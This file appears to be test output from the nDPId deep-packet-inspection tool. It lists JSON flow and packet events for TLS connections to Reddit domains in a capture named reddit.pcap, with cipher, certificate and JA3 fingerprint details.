+01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01287{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01287{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01257{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}}
+01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}}
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}}
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}}
+01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
+01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686301,"flow_last_seen":1605291686301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291686301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605291686301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686301,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML0AAAAAoAL9IDDZAAACBAWgBAIICql05vEAAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605291686327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686327,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBFWUkNzC+oBJXgILuAAACBAV4AQMDAwQCCArC1zmoqXTm8Q=="}
